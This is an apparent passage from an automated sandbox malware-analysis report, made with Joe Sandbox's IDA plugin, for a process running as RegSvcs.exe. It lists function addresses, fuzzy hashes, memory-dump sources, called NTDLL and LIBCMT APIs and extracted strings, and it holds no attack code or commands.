Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec1706008c37b1d0aa9226c1e64621cdd93bae695fdbcbb300fbd3097e0d23a9
Instruction ID: 8c4f1882e29c9096bc183612cd87527e72e43959fc00c7648ff058830e2a5fbf
Opcode Fuzzy Hash: ec1706008c37b1d0aa9226c1e64621cdd93bae695fdbcbb300fbd3097e0d23a9
Instruction Fuzzy Hash: 13D01770921308EBD704EFA8E5466ADBB76EB42302F6041AAD80427350CB315E84DB95

Function 08F8A34A Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af5db30be00a4f45beb49bdaa48b6098b700ada4d04e4a9d780c8fb5b425aa7c
Instruction ID: f691ecabae24b7cc3fabd274a5d9aef045e139cb2aabbd4d561f3adc38130833
Opcode Fuzzy Hash: af5db30be00a4f45beb49bdaa48b6098b700ada4d04e4a9d780c8fb5b425aa7c
Instruction Fuzzy Hash: 2AD0120A18F7C68FEB0B677488609443F700D2312934A00E3C180CE0A3C0A8494ED33B

Function 08F8B5D0 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39756ab1d41e677abf3547cc0f3c935c5ba7c2b93b4d9b12f1e4908584f376ea
Instruction ID: 85db2726fb257b1077b7656d032f58e0cb0b1ce8058bb25b11c62e4ce6eb2a65
Opcode Fuzzy Hash: 39756ab1d41e677abf3547cc0f3c935c5ba7c2b93b4d9b12f1e4908584f376ea
Instruction Fuzzy Hash: A1D01237240208DE8B40FEF4EC00D567BDDBB18711B408462E504CB124E622E464D761

Function 08F8D950 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4f3fc3dd34526850baf12c381b7b553087be3f2e7a0e65f5c9a64cfa037bc25
Instruction ID: 64532f401fb663f563352f67aa40cdbb26971ddd08529527dd3f4ef1be9914fb
Opcode Fuzzy Hash: f4f3fc3dd34526850baf12c381b7b553087be3f2e7a0e65f5c9a64cfa037bc25
Instruction Fuzzy Hash: DEC08C30034A0597E30077EDF50E3383EA95B02303F400013B10E127924F640400CA6A

Function 08F845B4 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17f15bd70c35a650b0e8bc4053e4e7ab71c5619836f18650c676be42dc4a6531
Instruction ID: bc0a9e9a5b07bfd3176c05ed8da92c5c22655b0281fb4f75254e59524795f54e
Opcode Fuzzy Hash: 17f15bd70c35a650b0e8bc4053e4e7ab71c5619836f18650c676be42dc4a6531
Instruction Fuzzy Hash: 6EB0122F194341E2930872B48C88F2E7A11EBB6703B908C03774644040C531482DE51F

Analysis Process: RegSvcs.exePID: 4296, Parent PID: 8128COMMON

Execution Graph

Execution Coverage:	0.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	5
Total number of Limit Nodes:	1

Executed Functions

Function 01182C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0119FD4F,000000FF,00000024,01236634,00000004,00000000,?,-00000018,7D810F61,?,?,01158B12,?,?,?,?), ref: 01182C24

Memory Dump Source

Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6be6f1172b680e587512639fdb1a1fc43343166a54fd6db2e6d505164294d7ae
Instruction ID: e7f4d61e65c81b80bab9f237f4750aa9cc9bc76564ea464632f9ed30a0aefddf
Opcode Fuzzy Hash: 6be6f1172b680e587512639fdb1a1fc43343166a54fd6db2e6d505164294d7ae
Instruction Fuzzy Hash: FFB09B71D019C5C5DF16F7644708717790077D1701F25C061D2134645F473CC1D1E675

Function 01182DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(011BE73E,0000005A,0121D040,00000020,00000000,0121D040,00000080,011A4A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,0118AE00), ref: 01182DFA

Memory Dump Source

Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 64219fee77333a259f408d763f81a0787eccba63899a90f91f6c0b869c75a0c2
Instruction ID: c0c5458101673816b02ba26aa5e1acba579bbf911d0bf756699f354be363f8c4
Opcode Fuzzy Hash: 64219fee77333a259f408d763f81a0787eccba63899a90f91f6c0b869c75a0c2
Instruction Fuzzy Hash: C790023160140813D61571584604707000997D1241F95C412A0529558DD75A8A52A225

Function 011835C0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 011835CA

Memory Dump Source

Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 774690b69b33b97f2f5c4965475795bdebd26cebad3e38f4ddeefcc0e1412543
Instruction ID: c69c9fc33a7f4114a80cc5d3d98ced325acaacba2db3faa974abbb3cf96745a6
Opcode Fuzzy Hash: 774690b69b33b97f2f5c4965475795bdebd26cebad3e38f4ddeefcc0e1412543
Instruction Fuzzy Hash: 15900231A0550802D60471584614706100597D1201F65C411A0529568DC7998A5166A6

Function 0042E935 Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000011.00000002.1758032478.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_42e000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f23161632fb5b3f3c493444c7e7a2074723b82a6fcf632197c1ffae55a7424ef
Instruction ID: ace196b2461c6c1bd2d875e8487279a7d84a016af01964a98343b282167b5eca
Opcode Fuzzy Hash: f23161632fb5b3f3c493444c7e7a2074723b82a6fcf632197c1ffae55a7424ef
Instruction Fuzzy Hash: 531152B52002199FDB45CE55E881AEB73A9AF48710B44816AF9188B341D774E990CB94

Function 0042E581 Relevance: .0, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000011.00000002.1758032478.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_42e000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d471b4daf8821a44005f35bac5614195c06c134650c974fe7d0b1d6064a31efd
Instruction ID: 36010cf85de269a330a74318b7370a61f392f1002f3e6638b84986928a397ede
Opcode Fuzzy Hash: d471b4daf8821a44005f35bac5614195c06c134650c974fe7d0b1d6064a31efd
Instruction Fuzzy Hash: CA01D871D0022867FF64EB959C52FDD73B8AB04304F5002DAA60CA2182FFB4678C8A65

Function 0042E583 Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000011.00000002.1758032478.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_42e000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ab143658a79941cbbfda85d2c16fe54368d10f9503303fed53ef97c29afc7f1
Instruction ID: dc3e8d177bb842c3979ea6e6a987604fe14a5e1ac564dba5e79ce29406088d86
Opcode Fuzzy Hash: 1ab143658a79941cbbfda85d2c16fe54368d10f9503303fed53ef97c29afc7f1
Instruction Fuzzy Hash: 1F018871D5022867FF64EB959D52FDD73B8AB04304F5002DAA60CA2181FFB4679C8A65

Function 0042EAA9 Relevance: .0, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000011.00000002.1758032478.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_42e000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c85510444824a58254b8765055798e05a5d9782dd5e129e246536b075605c95c
Instruction ID: e57714a510b992dcf1b415ff8161f977a58e0f5afd61c147efbd3d2e3582b188
Opcode Fuzzy Hash: c85510444824a58254b8765055798e05a5d9782dd5e129e246536b075605c95c
Instruction Fuzzy Hash: CBE09276B4152027C620569AAC46F6BB76CAFC2B20F0D41B7FE0C5B241E6686840C2F9

Function 0042E943 Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000011.00000002.1758032478.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_42e000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a1e8ab1b6f2c79ffba9a1ec0332bc05f575c190be56660756c26d5b78e1c0be
Instruction ID: d2554d859463da610aabc1fde6e19503784a04a8efb212309120388786e4b453
Opcode Fuzzy Hash: 6a1e8ab1b6f2c79ffba9a1ec0332bc05f575c190be56660756c26d5b78e1c0be
Instruction Fuzzy Hash: 9BF098B6610209AFDB04CF59D881EEB73A9AB88650F04C569BD298B241D774EA50CBA4

Function 0042EAB3 Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000011.00000002.1758032478.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_42e000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e335e67f75993d97682cc43935a7343131bf71ceebcf805054258a935c5e48ca
Instruction ID: 1835675a84d1e23dd5a95dfa8d8ad343b0502b961825f32e2c7005a54a23b675
Opcode Fuzzy Hash: e335e67f75993d97682cc43935a7343131bf71ceebcf805054258a935c5e48ca
Instruction Fuzzy Hash: 7EE04876B4022437C520558B6C05FAB775C9BC1B60F4D0176FE0C57341D564A90082E8

Function 0042E9D3 Relevance: .0, Instructions: 13
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000011.00000002.1758032478.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_42e000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 862cb582f55d554a97e4ffb2a8e013e9ed2c654007d7a577d9d703b3d8d9688a
Instruction ID: 8ba6edbe5e3470fc33e52b5cde441f923a7206675e3574fce1ef5207c09daee9
Opcode Fuzzy Hash: 862cb582f55d554a97e4ffb2a8e013e9ed2c654007d7a577d9d703b3d8d9688a
Instruction Fuzzy Hash: 65C080716503087FD700DB8DDC46F6633DC9708610F444055B90CCB341E570F9504754

Non-executed Functions

Function 01184A80 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 51
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDebugPrintTimes.NTDLL ref: 01184A8F

Strings

0Ivw, xrefs: 01184B14
0Ivw, xrefs: 01184B04, 01184B09
0Ivw, xrefs: 01184AD0, 01184AD5
0Ivw, xrefs: 01184ADA
0Ivw, xrefs: 01184AEA, 01184AEF
0Ivw, xrefs: 01184AFA

Memory Dump Source

Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0Ivw$0Ivw$0Ivw$0Ivw$0Ivw$0Ivw
API String ID: 3446177414-4119021165
Opcode ID: 25e62db6ccfd91a38d0de763a9fc046aa8bea4977038166e5a9f7d0d2d3f2bdf
Instruction ID: 1fd993a88de25c54ef4fa11f429e33d45248513282b5dec1663ef79d0c63d8e2
Opcode Fuzzy Hash: 25e62db6ccfd91a38d0de763a9fc046aa8bea4977038166e5a9f7d0d2d3f2bdf
Instruction Fuzzy Hash: B6017572E552115ADF39AB2C790C7867B91B7CB728F05405AE948AF384DBE04CC5DB90

Function 01182890 Relevance: 9.2, APIs: 6, Instructions: 190
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___swprintf_l.LIBCMT ref: 0118293C
___swprintf_l.LIBCMT ref: 0118295E
___swprintf_l.LIBCMT ref: 011829A3
___swprintf_l.LIBCMT ref: 011BA52E

Memory Dump Source

Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd

Similarity

API ID: ___swprintf_l
String ID:
API String ID: 48624451-0
Opcode ID: 94eb677ab28fdeb630383a9885a77332ae0fa56281b3413367c57c9b29f26e41
Instruction ID: 69707687f69e99cd1cb41684c8419a7aa1c1aa1f2a8deb61de72fea51323fc01
Opcode Fuzzy Hash: 94eb677ab28fdeb630383a9885a77332ae0fa56281b3413367c57c9b29f26e41
Instruction Fuzzy Hash: FF51D6B5E00116BFCF1AEB9D889097EFBF8BB49240714C169E465D7645E334DE50CBA0

Function 0115A250 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 404
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 011A79FA
RtlpFindActivationContextSection_CheckParameters, xrefs: 011A79D0, 011A79F5
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 011A79D5
SsHd, xrefs: 0115A3E4

Memory Dump Source

Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd

Similarity

API ID:
String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
API String ID: 0-929470617
Opcode ID: 324921623a2b83e2d0cb2e2afe791def0c5cb29416618f57ee9ebe1d06a9c328
Instruction ID: 52423d6c407b3964c71fa837166ba06f6664a8c0155fc486e0806ee415102790
Opcode Fuzzy Hash: 324921623a2b83e2d0cb2e2afe791def0c5cb29416618f57ee9ebe1d06a9c328
Instruction Fuzzy Hash: 38E1F170648302CFD76DCE68D494B6ABFE1AF84268F080B2DED658B291D731D945CB92

Function 0115D770 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 372
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDebugPrintTimes.NTDLL ref: 011A948C

Strings

SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 011A936B
RtlpFindActivationContextSection_CheckParameters, xrefs: 011A9341, 011A9366
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 011A9346
GsHd, xrefs: 0115D874

Memory Dump Source

Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
API String ID: 3446177414-576511823
Opcode ID: 401ae3370b0c5a32e0d0ee738ff885217a66125954aa94d5c7e24e0312145923
Instruction ID: ee7b41f25219f4340627f9e2922f143b5d9fa8d3436265d46a64239936c3f967
Opcode Fuzzy Hash: 401ae3370b0c5a32e0d0ee738ff885217a66125954aa94d5c7e24e0312145923
Instruction Fuzzy Hash: ECE1C474608346CFDB5CCFA8D480B6ABBF5BF88318F44492DE9A58B281D771D984CB42

Function 0118B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__aulldvrm.LIBCMT ref: 0118B6BF

Strings

+, xrefs: 0118B65A
0, xrefs: 0118B66F
0, xrefs: 0118B695
-, xrefs: 0118B650

Memory Dump Source

Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
Instruction ID: fe45715b8f8d229e94fc45f6a92100cda8e7df24535097717a438fc5954938b5
Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
Instruction Fuzzy Hash: 9681D170E196498EEF2DBE6CC8507FEBBB1AF46324F28C119D861A72D1C73498408F59

Function 01149126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 011A2559

Strings

@, xrefs: 01149175
$, xrefs: 01149191

Memory Dump Source

Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$@
API String ID: 3446177414-1194432280
Opcode ID: 7aa1fe4d7e1da5b7812250bd830ddf7d03d61e3eda0b1247d7346a1bb01ae61a
Instruction ID: 43bc7339d5a2aecf149d4202c4e6b2eb593f6aca23cc6093a1b3160a2ecdd6d4
Opcode Fuzzy Hash: 7aa1fe4d7e1da5b7812250bd830ddf7d03d61e3eda0b1247d7346a1bb01ae61a
Instruction Fuzzy Hash: 94812C75D002699BDB39DB54CC44BEEBBB8AF08754F0041EAEA19B7280D7705E85CFA1

Function 0116D7B0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 151timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0116D959

Part of subcall function 01144859: RtlDebugPrintTimes.NTDLL ref: 011448F7

Strings

p/, xrefs: 0116D83D
$, xrefs: 0116D86D
*, xrefs: 0116D846
$, xrefs: 0116D900

Memory Dump Source

Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$$$p/$*
API String ID: 3446177414-332567944
Opcode ID: 78a586c1a94789e04be40f25134a764caf7d1f037a9cba14660544c91e3de304
Instruction ID: a0fca8f4e6946f288719047a646ed4b94798f5b3c16c7ec69522795d7f85b0ca
Opcode Fuzzy Hash: 78a586c1a94789e04be40f25134a764caf7d1f037a9cba14660544c91e3de304
Instruction Fuzzy Hash: 9A51E071A0034ADFDF2CDFA8E48879DBBB5BF44318F144159D8456B285D7719991CB80

Function 01184960 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 82timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 011849A4

Strings

0Ivw, xrefs: 01184A13
0Ivw, xrefs: 01184A23
0Ivw, xrefs: 01184A03
X, xrefs: 011849F0

Memory Dump Source

Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd

Similarity

